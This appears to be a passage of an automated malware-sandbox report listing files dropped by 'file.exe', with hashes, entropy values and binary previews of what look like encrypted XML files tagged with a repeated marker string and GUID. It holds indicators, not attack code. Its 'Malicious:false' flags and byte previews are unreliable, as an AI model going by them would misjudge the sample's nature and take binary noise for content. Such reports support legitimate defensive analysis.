          Preview:<?xml1...Z....m.!...n......MP...f...@fi..m..&..y.".....CK.."...VW6..)./U...d...-...{".(Ss..td=..dU..s....w.p...U......HR..8..eL..1 .u....^"V..K.`.......a_.qC..tx.I.r..q..t.?..a..+..J.Q.6..S...{&.......g=...Bk.O.}......6....V..)...}....C=.C..0.......KH..J.{.06=.u.<...4..H..f....7:.ZJ.4..C.......[_nN$.h.L<.E.@..g..1>....a...5....%.b.7.....Z..d..x........'.8.".f...Bq.zK%L..8......O....f*<...k....X.C...........j..M.U..!r:,/..}aP...../"....u:~I..b.l..a..l)..B.Z....Z...yt.:.G.........[r.o].o..0|x3.Nx...h..'..n.0-.N1@.^.......C.>.\&x...r.!...*6.K6".t.7. |.......".g<.tl..\.2mP_.iZ........5.9:..U...I..[?*...-...c....6.hR4.V..$.w...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):807
          Entropy (8bit):7.761233457197577
          Encrypted:false
          SSDEEP:24:hE8QUXxteQiq457t34fTOhnDWik4mAAcwviTkbD:hFQUXdn4z4r6Zk46MiD
          MD5:16D924C294C87547C7B1C88D51279F16
          SHA1:D69EF261CA1D96885600486557B98DD030832078
          SHA-256:81417C8481D4F3841BD171D0DF9F726ED4F9493AB0D9B417D556DE499B248F0A
          SHA-512:510AC98F750FDD3359FCC9B8AF108771D06D5622D31545C0D10148B742840348520865DA001DBF93B96E8874A8D50D063C85BAB8DFC0837FFDE2CCAC9E6920A2
          Malicious:false
          Preview:<?xml.O...a\.B....-(......Rf.z.......R]..C(..t.l...b_.-..M....z..".$}.z...|....W.g.H.*..k....y...+JF..Feb.....8#.......?..N..[...B.m.=p....g.q(...vH... NG.9...Z..s0..)...D&..:......c.<........A.i...2.a..t....hG02.I..8s..a.o.t...q.[)h....r@.M...o.....*.5..wUy/....Y.M....?H.w.d.0N..+I..FPj.L.\...v."1...Jw.....V6..\.W...p...Gr..},......t.c..3.@@..mj.."g......*....N..|*...+9...&.;#..v ..d3`...V|.z..Jh..(].+.p..S..O|uD.~...1...=]......n.F...a!Y.b..q4u.rN.......T...........{.{..Tc.f...:..............m....xocQ.:.W`<R....Eb.ED+.d ..h..t.............f........e. .....W.6....=....XD...g{..X..?Tf.z.).5...T]vSi......... ...6....1...V......n.I......\)#..{.....(.]..v.?..#.L....1.J.Uy1u..2.@..gk..N.f.5r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):741
          Entropy (8bit):7.653506685143962
          Encrypted:false
          SSDEEP:12:+4qUBd8K8Ft+Tjk+dMT5aCqqaqnvsP3Cgau0o2/yV4LvVJ7ldvUueiRlES2VixpW:FqU/at+sUS5alynvKCgc/yVUVJJd2ie1
          MD5:68CA5D2786F0AF97ED9CCD8D576F24AA
          SHA1:19D91E10239DD4A761EACFE5376F87A6AD000EDC
          SHA-256:3546A2E2CD53375030765ABF335E54C106919CB43FEFEE2F65ECF84ECBFF8158
          SHA-512:BBA69578F63EEC7B562B58595F7D36248608AF3D0E490205DA31E50C7ACA17ED1F31BEE14D2334AAC9372F14D0BFF78CCB8789B15E0A3E1CFC8558E8EA1911D1
          Malicious:false
          Preview:<?xml..S..5..=..Y....D.UMg...*...?...8..g .Wn..........cEh..n.ka~(..f5\......H.[c*W..?..+u.K..^...b>w......G....;..p.....2....zb..]..H.\..n.X..pf..l...{..[+..7..4._..F.......:u...3B...Q0y.:.q..,.53..6..:..Q.2...I...C..X..YP.T;..:.'.O|.J-X.1 .A..}7.-..;..e..B;..0..H.;#...{.0H...`.Kb.3z.g....@..?._..t.YN...?d...5....t.[...Gg.p...."^..o...XLM.4.%j...\.Z.._.E;..ML.E.?........8>g&......e..,<gvJ.....(b...U;..+.._.f.D.."...UhR.q.T..O.H..[B!.,(..]3.>..p....5.'t;s."d..A.`............B.-A.z.......D..F......v..sG..Y}O.`LW.v.R....l.[..;L.....l.R.....%t'...SG.y.B.LK...f...dJ.].~....1..1..k.J.w.j.1Z*c.L$zy.O..Qn_..E.^...w...Y0..B-..Ey&...Q.]r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):802
          Entropy (8bit):7.7119475715866965
          Encrypted:false
          SSDEEP:12:xCmX0VmEp0nzgS2Q/8i3sscyFCVN5l0SCuh5ga2nloy0eISJlaixpZacii9a:xChWnr2Q0ifcyW5KeenYlylaiTkbD
          MD5:C28434449BF5DC56E73B10EB0FD27B5F
          SHA1:22E8733E8DD477FFDB2F1B15904AB2F58CEA111E
          SHA-256:AD7ABFF54B810249DF548D837B8E1538915D651C98B983DE09367982B57F6BA9
          SHA-512:AC5201D673490367B91343F7B0C23E48220648CF126D8A15F21A04FB221EEDCDC90754BD0E86FAA9F16BB6A81192D62F8BE857F4F2EB7E841E42B8510DE124A7
          Malicious:false
          Preview:<?xml......p9....c..XVuv``..!r.1D...?jf.e......*Md.eCJdG..Bh.4r}.P...q.P...1....8o#..V1....B.hy..'.._..S...%..Pk.M.-..*V9......;.ZL^.S[.r.....2.zF{.*..|O..C...[j(..B....o..Wa...M.i`..... .6S..G4.-.$....`...P..YG..w...H.r..@.....2..&.x>B.:p.Po,.>[8..l.n]..,{&%......"..4u..G.t...A.......9H!:..&.....h....k.._../.N.Y.......~!.=..'...E.6.FpR..y%...$....7.u....Z.{.&..B1..B...L...8.b.Y...V5.*f.<...kb\L.t.....4N.....5X.....'..`+...)..q..."...X......}IK.$.......FX0.[.k\.pu..b...o..U...*}gN6T5..P.d.?..P.i..l......H..].....]G|W.sj.=0L%g.;f....B!...ztzL.%|3./J.3..`...@...P.;.U~".HD......Q..Y..9..5....p..V~...=66.|.R.Pm...V.e_2F.2i..B.....x+..w......1.$f2....:.Q....g.&..V|.8S.....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):749
          Entropy (8bit):7.688480337281379
          Encrypted:false
          SSDEEP:12:+yFQ8H7eyFada4Bi1wSUTIjVazPJcM3YyR0ZktpQIBTNLfORCiTu8GkMSDixpZaX:+SHKyv4Bm1UTY8zPJYyRgkXQIxNLQTbt
          MD5:5E1830D7F097FC28A704E51ED69AEE9E
          SHA1:7D0928B27D375A3B808BE61FBBF428C8DAFC26F6
          SHA-256:FE12EA673253A430DF6C553829B7130C8A180D58B602C7D809820CB289CAFFC4
          SHA-512:7907786257C1EF8C62B1ACA1EFBEE3604EE57FD40FF7E3DFCAB908DA4309641C6A096D62F8F925E9E811F058B3EE0D98F6B1903EC0E586CA0BB196ABA59AEA9A
          Malicious:false
          Preview:<?xml...Q,m..%.D`.5.-.....{;..5.Q....v..:5.F.[#......a.UV....Q&..%...N....&..V*s5).F..+.t...}..5.....\..%..)...'.r.......TX.M.).}:.Yh...IK.d.[..(..k......erX...mF.X.(.CyJ.I.]...#.Z.5t%..X...[-F..L.\.%[....2.\7..t."m._u..D.r..F,>....W3...>.C.;.4$..;.5g..::..s.a5.........&.#..j_....o..........V...F.j%......h.../.!..v.'..OK.}1.....K/S.p`...5.x...C**t....f.i.5o:.....xz......RQ..._..Z....S'H.\`.pp....eek...N..Vb.........(.l.r.<+)....y%..p7.{.W2.g..6.{...G.).s...]..{..Q.Hb.[..yH...5..H....j..o..&t......h...Hx...3......?i....3...vh.E.E...*.?.O.9(.VO....Y._.5'.U.e~.\.....5...^.v.t.`.^..........7.e`.Hv.E.d....T)$.R..W_!%..i........#..".wTcr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):805
          Entropy (8bit):7.7351625280823155
          Encrypted:false
          SSDEEP:24:CpgPDEToKazblBv5+BNHkZs+uhlMCcfaHltYiTkbD:Cp0jKAv5+p+uhlBFtJiD
          MD5:6DCE0C2A7F2D6634F539BF570834665F
          SHA1:AE9417D422497954307CA3C7025E361DC03C6DED
          SHA-256:8F911337F25CE6542F50C3D1BF75C1DF21B0C8C3E6CA9D5A95E9D2F4ADCEA24E
          SHA-512:3EAFB25D28C27260E02EC22A3547B006F79C5E8DAE63D0804DB8279306004437AC45F7E8EEEFCD70C43172E11BCE28BF2DF3647DE23AC73FA6D208F3769F61E2
          Malicious:false
          Preview:<?xml...8..sP.,...r.....h'..M.C.G#...R..%..W...3E..;.'e.7.....c...|...<..00_?.....K{..).- ..g..}.1...P.......`Xh.J&.... ..^.k^......m.T.$.._6_..=$.SQ}.C[y...Ox... z4?..].....M.U+ @T.........N.P81..^..N......t.)Q...9..`.D{n.`......3.$...Z7........@.W..m$..9s...aF.?.....5t....7.....%.QZ.@.:0.m..A:5.....p... bl8.....0.R.|VH.[/e....5.W......M..T.._...E.....x.^..rd<".........ZucB.?...1..5.f...?..x...G...&..aUo..5....c..7...b..".&..7,.tqcL.H.+.....J...2.m.%....T.,/.^..xV.G60.X..k........{..Zv.......P..6>.\.;...(.|..F.&u....{^+I.8~...y..9...:j..T......#.\.\up..D.f.&....'..[.@........B.wD%.1.lx..1c...lT..[...a.99$...w<..l.~.#..%...%.`7..Y..e...z...u...L...k......R.!..W.J....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):765
          Entropy (8bit):7.715360752208181
          Encrypted:false
          SSDEEP:12:jiZalhnN9JEJJMNGJ1V9MU+EzSD1E3Nr7e1zQbbEMvkOwyRofDrZG8SixpZaciik:j00hnNw7MGTVvopuezQkMsC0Drg7iTkX
          MD5:A2F260C713DC839264F319461800C9EA
          SHA1:68DC06514D5FA3B04108980CC6149616A2FDCCD9
          SHA-256:4AC456C64B8D11E631106D634D4065B4248C4F226C475A7BA077AA519A681F2D
          SHA-512:4A1EB988FE30A85A345EBA444E477C458B4D3623DE909962D4360CB0724DECF1C635AC2B67888E84EA2A0E6906B86D85E948638689AAFD94FC88F53B117649E9
          Malicious:false
          Preview:<?xml*.P.{}...[zH...L....;xH(N.W...lC.G)...o...4.. @Q5W...%...N.....#De%<..8.C.o....#xc..(..u2.g...4....C..=u.C+.xX.`}.C...:.....P.Ay.(...tZ+....."...h....J.$h.Ic....O.=b3.....:gV...5Y.....j`..Y...yu.&GKy2UM+s@..}..J..s@.....W,.t.%btyq.7...e."...r...3.r.j..u.:5....I..w$...^8.%.h...8U..Lh9.;.G;2...".g.....b.'..O..pK.P...6].5.....0...t...za.......o.&.?..K5.e.......p....F=..`..$A.=Fu.n...5.W.......].....TL..|.o.i.jf5b.5......g>.;.g.+[_.I.qV.+..g..0..W1..o<}...Z....sC..1.i..!.v.(...p.W........C.. _.....Im....l...<..mz../...'...c....P....l.l.Y...y#..D...j.i@J,qP.{.L..I.c./..C....[.H.F<..V.T6..m....*..e.$v...>.... .:..#.F...W..f.k.e.#.3.z.I]..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):808
          Entropy (8bit):7.743432356845982
          Encrypted:false
          SSDEEP:24:zzE3cGIFQL77EtISDZdiKX/HAwdIWJiTkbD:+nI67ot1DZdiKXIwdDIiD
          MD5:D98C47E7EFCB43DDB8CBD1400E6C27AB
          SHA1:B542CF038D2167102D89EA76D4587D4A438AC6F3
          SHA-256:22D0167F21D5F48630585A7B2BB1F9555B7DEC5E20BE0212E32E23D6DB20708E
          SHA-512:F81CA8D2DDB735B944BB4DB37496530EE1A63218CB6390184D680F8CFB4E696CD6E01BCBE117FD7BA93BB7C56C56DBD80918DEFC05CD1C981976A1DF2764A749
          Malicious:false
          Preview:<?xml.r.R.-G.@B..Y.&b7..F...%."$Zr...v..E.z.T...g@...XF.B..B..=...#.5..JM8....z.#.Yt\.D..bUm....q....-.'.+....%.W.t.....T....{k;..Eph|.....R..6....;q....}...}..,9.Y.........[........6.`......6....%... s..:.....0......w.p..../...Qy.r.....L.`J.H...C..?K.Vp..).*M..lc.o=..~)}R=F.....X..}.`........L....2...\....n...T...O:.."sGY........2OiVL.MQ".S.J.U~rh....H(.T...v/D...i.i..S....R..fSA.t)..........F3.7d4...C.pd..2.Q.. ..6Y(".....1..>.>@q.f...R#.......c...B.A..s..K....^y..[g..M....9/N..)...<...{.g....d[.E...#~...O",.o...S.=%c.i[......S...5...+......W..V+..-H..&..-..v.`.=.e.Rgo...-.Q..S#......%<1.6 ..?...z!....R.rd..R.....o.LC.|.tb..%.q.).X5...j/8:5....5....@....0X.K........W....s_r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):760
          Entropy (8bit):7.681038394336706
          Encrypted:false
          SSDEEP:12:bWo5/iBcb6wuxRC7LFzj2yfynNszYnttc5Tluc8YLqzU9GE6lVA1s+QbixpZaciD:WdZs7xX2P5ttc5TlucDqzk++fQbiTkbD
          MD5:FD86B3CC815393F2E1ED9E59A1439CAC
          SHA1:FC51E0E22DC1C208E539AAA503579A622520B752
          SHA-256:AECFBB3BE58D2190EE59C3F7B38DF88BDF62BD7CE3D847054934F3BBB3E05565
          SHA-512:58C70DDA1B1BA29BB0150A599D77CF6EA8374C1FFC293A2AAFBDFDCC44079390786DD38B2BBFC10F0AEC56AF542AC538C45E1DBF46D70840DD88588490568289
          Malicious:false
          Preview:<?xmlW}....<p...i.N.n.<_...Z.....>.|...wJ......6...p.....'Ot0).~.vp...e.8V=.q.....s..{)(..F...`+4.R=x.:..J..[..T....k....#9.......-.K.g}.zk..%:...SM.J...!.f3..Uo.9".......p|(sJ....t.w..0....S.i...,.R"...b,.a.Q..1US{....J$.3EC..z...mq.U.E..9.u...)=..,..$Wc:.<4.}..`^..m.p.3.2.Y......I..?.G.l...4..j.&k.......^r.&.?,..t...._\.@1%'M.r.7..G.y>T..").............W.7.*.V..[....r..b.Qw.s.r..l.&.-$.h........n....X,Z.....4"..6v...~..f..\..z.l..c..9...../..+.W0D....K...-)d.\.a.^.4.v..a........k.."{....B.d.AO...V..p...l.NZ..-Y...P.J|5.......<M.Hb..d._~W.)\.L0..7@..J......g......5.......m.......o.RX....x..'.}.4..[;l.sp.`.E...P9.z.0......jz.p.Ub.%T........r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):807
          Entropy (8bit):7.737923269140177
          Encrypted:false
          SSDEEP:24:XSKc1BvSR6pA2qBao5ntoGw8W8rjcqXdiiTkbD:iHLS8q3VcqtXiD
          MD5:044DB7D1097195E1314234514B90244F
          SHA1:7B5E72C3B8AC26CDBE6552DAC8ABA1DB29347EBF
          SHA-256:A528156313692081A301D4A33E740456CE7339627A5FB2C9681F3DDB0BC9B049
          SHA-512:71266A9E3676C73ADE28D9FCC281ACCDC1F02CC85E8BBEA7ADE8E8D632D988D952595F62646DD1ADA390742D155A19EC0B3431C2D7C9F8023DBAC91B5317329D
          Malicious:false
          Preview:<?xml.@d[...MU.....4.H$*f.\B..^>@.....[a;.V....}.|F1.[...U..Z.0.`.vw.k8Q1K...a4.?..[.oL.....2.....1....Ez..L8.;..K.9........*~.>..zG......'....9m..$v.h.......w..mI....}...N.%|.....\...-?*.X.u..1.M5..-....o.....u.a8 .d.5..l.q"H..I...>.h.y.$..F.yGt..QH.S.1.m....o...a.......*......i.r_H#....]@.h..f.e.).7..R..c!.3..,.d.t...k......K....u......]......6Y...C}i7/...........Tw.>...>.-....E.X.WG....kr.....".\....0 #.~.d(w.....Y...m:....v$........K8{....^.].D@Z'.7Q.=N.t`s.>K>.\..vN......*[..x....N....Hlj....|..+.s...M.u0!.~..e..-}.q.3..`..g...zO........4.)+.f.i0...61....n5JG.P..j!...*...&...9.....I-@.x.jU.dz...?.........Flj..B<...B...}8....'.....r...p.#.....#J.!..M#l....r.._0...x..!...).g.4..,r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):752
          Entropy (8bit):7.673798570814103
          Encrypted:false
          SSDEEP:12:5dcRBBNRHvU1ORjVTXF79AwqmIHBEjA2Vib3SAB/2DEjhgh2nggwZzZK9R5sca/1:5dWBBNRH8sRT7GYIsBVIjZoOjKo6/iTW
          MD5:011DBCFB38135C9C48311D97B62D201C
          SHA1:BF2BC38B51D4D2CD97DAA3962553701A5C78769A
          SHA-256:6BA45A74C82BFF78B0CED1F974095F2504B99D39C2B997BE297F99BB93E6B848
          SHA-512:4F8C15DC32B3ADEABE52046C9F3FD3E9CA8B5851F42E8ADE86C3924E7D8563C24B6CE575F9DDC8593B02A6007BCC2E8AD6CC49DED0CDA607DF688E5C9771B672
          Malicious:false
          Preview:<?xml.4....M.,..9O.s.E..6...cJj..d.iF0 ...T...G...M...ul.78kp.&;i.....[j..n.b..Z_.Z.T...B.t.VV...4.h.[...J..D.&.|SlYdn.....tj.~.3.7`+...U..I.....@......r...Oa.2.k.\PE.}A..2@4...X....,.^So.].j0....A..uJVFo..%i(...x.[..K...N..]a.79=.K6.....>..%.sW}C.U..v..Q....2....C_....N.$...Of8....e.q...,.y...>....6~.r..sqWZ....3....cZ../.b~..>....5k._....i............U.v....."..=...i.3V.(..`n.c... ...xuV.../.#.....o....2B:.4...Ov...mt..@..Z.qB:.X....1.@,...LJ...U^0.....l1.y..P......R.v.v.F.L..%9]\C.....:x 7I.._....4.($.....Th:.....X.nXS.....A..B=.....-.....MT2.u.`.P.aRES.....)..L..p.9#..Xp..N1.L8.4..FMl3...H'd.q..~....w......>6.`z../.....?....].V...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):805
          Entropy (8bit):7.744879421963616
          Encrypted:false
          SSDEEP:24:dzJIj7dogjXbDZDniYsAD3v0D9ijUiTkbD:dVIjWgjBZDf0D9ijNiD
          MD5:DFF6FEF52026A6B08EC695C967CFCB37
          SHA1:41B187A1DB9267918C08C1381ECE3A2F9F7457F6
          SHA-256:863D405CFA348D1CBD765C20F2EAA1ACA82FB6CF08287EB56DDA0B88B50F9D45
          SHA-512:E4B4B9E750A00AC312DE30DA1FFBD0A3C002173FA240E590E3B9A47AD820BDD32982E9B54A1E03D6EE06DC7297E84D4F2B5F7B9883C1894F2940871072847947
          Malicious:false
          Preview:<?xmls....:?.%.|...<P..w.....M.....b.i.3L..\S./.{+....?.F{..QS...>n..eJA.....A..x..#.hq....T..:F.......F.U.8.=2'..f-{.7?...CL....0..&.....DUa...]&.......[.......Nji.`....o..."o..wL(#.8&.+....W.h...G..#.U....x_...'...E.z......e..F".N{..I/.....|...{.l.........'+a.{...}...T..q..~G......D..04.Q.|].W.*..".....s8...-..Kf..9...M.Y..G0...]..E.L..O@....f}........i.vX\.6V@.B..0..iE.+.,^.......2.{@..?.fT.....7l.+'.#6.C.P..|.F..X.L..Q/>......z..;:e.....-.7.......2...NRs9....^.#m;.......O..?:..P...........gd)..-...n.K@.M..__Oi....+.B{.B..8....K..z...Y.We'.T..pK.V.H.../T......~...\....<uF)3s.Dt.HQ.~5W..Z.hz..wf.jf.......i.MO....}...x..!.K)nM..+.....S..yS;...:....*g.pC=$. L..l....c...'.v.y<l.KY.Y.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):738
          Entropy (8bit):7.654709584837251
          Encrypted:false
          SSDEEP:12:7CgrlsT7lZ5QY/7Zt+CDwrSZA/1DveYs2DWroDEh2ogGwkM5uL2Ds4cixpZaciik:hrlsT735QYV0qA+A/ZveN2DWroDEh2ot
          MD5:7FD355B04932CFAF1B15B33F48518902
          SHA1:EB18D45CF83A5905A9A69E539A682F31767C2417
          SHA-256:DF1ACDE1831AECCFFACF81231D989CEEDC2BB05603116FE8CE9162C442C9DED1
          SHA-512:E59A80AE459B97B00CD9611FB6F738DD7D14A94543D6DD68079F693108EA842780D49170D34483200775ECD5E42336332D420C5F22D1FBD5E4F236CF022DF0E3
          Malicious:false
          Preview:<?xml.....Fm..;\.." .i<B..D..r..~O.b..(..o..x*..Bn.W....4.sQ'..Z...$.1.......}....g..x#....H1........cM..F,.....-5.a....ar...&.G.2.C..Z.I.._m<.wW.`...4~.6...v..8..BfV...]....`.a.sz......?.@.$...t.^...,......q..f.4...'..Cp...T.y.5.O.`.~...p7.Q..P...}y..G...,...r.....B.0rQ..q:........7><DQ-.....i....~K8..7...L...r....L....e.N..m...{ ./s9.-O*.YK9...E.5.......X&+i7....l.Jm.KV.8Jt..S.(F0..@Z0...u..!......5..zY..v.9].. 6.m3..."..f].jD.e.....7..ZU.i.T R...Z.6....K..mSQ.....G6Z...@...j.......~H.Y.".......R......:..i...q.......6O.e.[Z.....4.h.`,.b....:...J...5..=%.2......\.R...B...v.h..c.....,R.z..E.h...w...jL..B...rbQo...Pr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):801
          Entropy (8bit):7.671808810234707
          Encrypted:false
          SSDEEP:24:BLDZJsciDiVdjTJx9ewTQUP3DsueiTkbD:VDZJsc62lTdEEriD
          MD5:0856A843DBF689D6431CE6D3E746C6CA
          SHA1:6B523D543081FA6B07F8B6EAF5556377CAFFC8F1
          SHA-256:724065643E49409506B71E48AEDA7AEEE982462F2B2104C9C038850811501379
          SHA-512:1032E55A5A8C3088678925976A7156925B7A74C406193814D7A49BF18BC18938345F3425B542FBA94FDD157118C60283990AB380434ED90F3720563E19CEBE95
          Malicious:false
          Preview:<?xml.."...uXGl.2..M.x.....q.......i0......ZPw..u=B...%;.4X1.>..e.:...rG..u.p<0.....cBolc?@....H>....U+g}1......E.4.....S..3.........Z+.JY..>....y.2MH.6.Y.Vg.~f.GB...a..*.!d.r.m....|.%aB.Z}^..+....,..62.....c.&V..HO)..7.,Y..Q..%...7n.?..0w..Ym.K....^~..(.s.~j.Y1Hx~`J.N..B..... ^..[.q 3......K....m...j..M.sx.{.m.>W3@L...f.G.Gt.Q]&...?>...#.-OJ!;.....%..N2..S.y}..&@`...@.L._..yn.j!|[....6~J.0M..K...MC...0^Y.A.y.Q....>...3..z.z...:)..i..#.V.2..fB.M...C,p............^.&}.h......o..j......l.AS.Pj.._..K.....mhq.N6.{B.Dq.&5..>Y.V...b.7G.-r......i.W8b..~.{e.!...3w.U[...z....I?ig$..w/.#...`K.........S..H.G........'...2.B.. x....,..I.V.l?."..o.Z.`BRb$.w.-..{p..5.d...P.....K...../...._...D.....?r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):507
          Entropy (8bit):7.456551227382666
          Encrypted:false
          SSDEEP:12:SaRfZPTxh5mb28tSzOA9ib0m7Tmq4xGbYucODiixpZacii9a:lhb4Htea0mWdxG0eiiTkbD
          MD5:3BC88507988F523D97A941DC9F611C01
          SHA1:091AD4D7DB67F70E5413350FAA19F1A16B70D9AA
          SHA-256:A451468D41D4D190AAD0573D859A4309B1D8A4088CEC4B848479F0274659DEFE
          SHA-512:164D43069DD47F699B798FF65EC7EE6231639D9538E8B47774C92F8BB0638E69A5966C62F041714441F7986571F6DAA21373663BB9E101764DB95EA23CCCC1AE
          Malicious:false
          Preview:<?xml*.....N..*....8i..S-1.M9...t..<.a:fH.C.nA..Dg'.%]Bf%....&....Fv#..Gw.-.N..i......."..7e^dN@81...y.%3....m/.N.......3.W..r."....b.I..........1rD<.....|....'>t.._..9......t.0..M.5.x.S....Y......8...4...P..:.......%.s....<C..%p..#L.....!..c.9.......Vd.)D.jQ.s..@..{N.....\.<..H9..4N8K7(....X..GM..$..6.......C.d(.W...g..9.*XU<7...1..Vt..-7..?..\..v`.Y....'....."...i.........O...F.Of...{.e..F5...O.I.X.g........br6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2285
          Entropy (8bit):7.910996388298247
          Encrypted:false
          SSDEEP:48:QtR7OXz3kzB5hYcCZW+lNT00EXQhWtBb6x/kDtZd4w8/6Oy3z4iD:QtM3U7nCZW+SXqWtBb6CDtkw8/6fz
          MD5:61A80B2171D692BDCFDAEE50C5CB245B
          SHA1:525F406FC5CC916D93B862BB5CEE85BC65451EE0
          SHA-256:B0F2626E01DDA447E039C6742D1BAC2410DAE020438BF25C5E89DD08066BFA3F
          SHA-512:9A9850BE131C4D92B3AC2A771EDA6F30D500AC69659869110E6C8A49BC809F683886A3CE5705C4486D5D3EF83362E3F5F0F0BB5196E287775DFAAE79209E1152
          Malicious:false
          Preview:<?xmlm~{>2.jy.d.t.....k]...L..X.../w....dh...b.#....Hq[..-....U?.ov.......2.Z7.q..K.~.9.[..p>...SM.6...|.gH....V.5.......x.vRMb.BG......5..'.....Q...`.....K+.Z.9d..^.....g..9.7..N6.p.....2P..S.i.y^........g.j1)...n.XZB).0.O]..].=7F.T.v...A.%.&.._C..h.XG.x..~;..NQ..*..tV1......D.q...&SZ..V .~tr1".?.g...$..|`.@..........N...5L......._..r.V..F.5:.k.....quw.....?.S...o.t&..E..u.M........!....8.d...y.6~..b+..o'.M.Mo:..u".F}..U#4..xY....t..f..'....p?.<..y^.h.D.7......C.?2....b7.<......@......(j.N3.V....d7...........v...........N(6...U.U...]..D..nB{A7......uk.....7,..39V..;cu..8..:[.<..h./.j..;.J.).."..p.zh..XS..I.1$4!../...>..........g.C....*e.W...H....t..-.)L,.U.~.d8.........2..k.*..y..8......,........<$.f..u.V.ZZ.$}..G+.......c].Z.13..G...tX..2..Yj2.Q7.*^.`.Z..]#Vq).....U.B.....8...E..~.M.!.........z.G....gMs.......A.8..[./QB#Z.J$...[.).Z..^$.(..}-l..._.1a.l5..>.r...Z...R2...DP....[ g;...X9c..9.....a]o.=...T *.[..~...B.Ba!R"..u.Vy..2Y.....d.5....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1291
          Entropy (8bit):7.841710016303086
          Encrypted:false
          SSDEEP:24:cCJIMr+R8mJTqlv7wSDJxUwuB/NtV8vigh/yhXC29IIosfiTkbD:cCJIMlmJWlv7JlhuB/TVujCXz9L6iD
          MD5:27B1A6631F4D8FE8C7DE4701B46D544C
          SHA1:20C34D765E6952C55984C8D98C82CD16EAB4257C
          SHA-256:A73D31326A6AD26FEB96DDAF249D6B07352AF43FF480DDF17485C94376B6A13A
          SHA-512:690B9D37520059D1354EE16905E6529C69641283AA24A7073557613E7F85CF823CB6F81378B39E11E4F9A35F186B41B2D6E8BCA48C530874EC377E361E4B924D
          Malicious:false
          Preview:<?xml.....'...(.....PV...{L.U.%2.'..b.j..)5.z.;.$.).W^.J..Q......:......i4.<....1yM.;.@......<.E.g(.Nn.M..U}".zL.c..#.W.....n.q|.e/z......'.N..U..0M~T:._t..'....b...'...'.V..w..."....'._....../..:@......Eu...]R.#8..8:.t....4[D.j....7.cO.y.|h.+...u.B]..<.~{.&..E.<..t......)kh..+e...Y.....O.# U..a..`..V....e.<.jH.1.!!.$=~.^.1.".K....:.h...jiVxK!....f..6F.xN..V....l...SnS..Jm.Z[.&..P...F....Ar....A.(....3...T....R....YK.q..x.#.......,...o...t.Qy*kx,."CtaH. u...Q..9.zk.C..d....Gu...8/.d.....u..O..h...0..W^8Uz.s*3..p...9j.......qYjJ...h.T...[...\c...N.):.aIu.\&...UeB..p..6L4......b.O+.4...........C$t..9LS.....~_.1.o1..b.r..B...c..x.R.........W..6.5..>HL.%.q...`&.....[U..B.B..^*b..F.[..(.`..k#.!lQ=.&...-.2.Z....L.Q..y..U..S$MA.H..<'.Z1#...,..~%7vn.Q4....^.2@q....9C.wW..u.H...<W.D..o$.q..rx..G.Xg0.V....G...~c9.z..jru..}.p...p.s....xL.7z....`.......F..?DZ.ug..}.V..u.8s+.....voLkP... M.=0...TB[...y.'.[93......k..._.5t.P.-."y..U....*.N.&
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):834
          Entropy (8bit):7.7465646066684934
          Encrypted:false
